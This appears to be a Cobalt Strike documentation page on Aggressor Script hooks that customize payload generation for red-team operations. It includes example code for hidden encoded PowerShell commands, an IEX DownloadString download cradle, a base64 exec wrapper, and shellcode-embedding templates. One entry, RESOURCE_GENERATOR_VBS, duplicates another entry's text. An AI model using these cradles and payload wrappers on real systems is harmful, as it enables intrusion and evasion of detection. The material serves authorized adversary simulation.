Navigation

Hooks

Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.

APPLET_SHELLCODE_FORMAT

Format shellcode before it's placed on the HTML page generated to serve the Signed or Smart Applet Attacks.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set APPLET_SHELLCODE_FORMAT {
	return base64_encode($1);
}

EXECUTABLE_ARTIFACT_GENERATOR

Control the EXE and DLL generation for Cobalt Strike.

Arguments

$1 - the artifact file (e.g., artifact32.exe)
$2 - shellcode to embed into an EXE or DLL

Artifact Kit

This hook is demonstrated in the Artifact Kit:

https://www.cobaltstrike.com/help-artifact-kit

HTMLAPP_EXE

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

HTMLAPP_POWERSHELL

Controls the content of the HTML Application User-driven (PowerShell Output) generated by Cobalt Strike.

Arguments

$1 - the PowerShell command to run

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_POWERSHELL {
	local('$handle $data');
	$handle = openf(script_resource("template.psh.hta"));
	$data   = readb($handle, -1);
	closef($handle);
	
	# push our command into the script
	return strrep($data, "%%DATA%%", $1);
}

POWERSHELL_COMMAND

Change the form of the powershell comamnd run by Cobalt Strike's automation. This affects jump psexec_psh, powershell, and [host] -> Access -> One-liner.

Arguments

$1 - the PowerShell command to run.
$2 - true|false the command is run on a remote target.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_COMMAND {
	local('$script');
	$script = transform($1, "powershell-base64");
	
	# remote command (e.g., jump psexec_psh)
	if ($2) {
		return "powershell -nop -w hidden -encodedcommand $script";
	}
	# local command
	else {
		return "powershell -nop -exec bypass -EncodedCommand $script";
	}
}

POWERSHELL_COMPRESS

A hook used by the resource kit to compress a PowerShell script. The default uses gzip and returns a deflator script.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the script to compress

POWERSHELL_DOWNLOAD_CRADLE

Change the form of the PowerShell download cradle used in Cobalt Strike's post-ex automation. This includes jump winrm|winrm64, [host] -> Access -> One Liner, and powershell-import.

Arguments

$1 - the URL of the (localhost) resource to reach

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_DOWNLOAD_CRADLE {
	return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}

PSEXEC_SERVICE

Set the service name used by jump psexec|psexec64|psexec_psh and psexec.

Example

set PSEXEC_SERVICE {
	return "foobar";
}

PYTHON_COMPRESS

Compress a Python script generated by Cobalt Strike.

Arguments

$1 - the script to compress

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set PYTHON_COMPRESS {
	return "import base64; exec base64.b64decode(\"" . base64_encode($1) . "\")";
}

RESOURCE_GENERATOR

Control the format of the VBS template used in Cobalt Strike.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the shellcode to inject and run

RESOURCE_GENERATOR_VBS

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

SIGNED_APPLET_MAINCLASS

Specify the MAIN class of the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_MAINCLASS {
	return "Java.class";
}

SIGNED_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_RESOURCE {
	return script_resource("dist/applet_signed.jar");
}

SMART_APPLET_MAINCLASS

Specify the MAIN class of the Java Smart Applet Attack.

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_MAINCLASS {
	return "Java.class";
}

SMART_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Smart Applet Attack

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_RESOURCE {
	return script_resource("dist/applet_rhino.jar");
}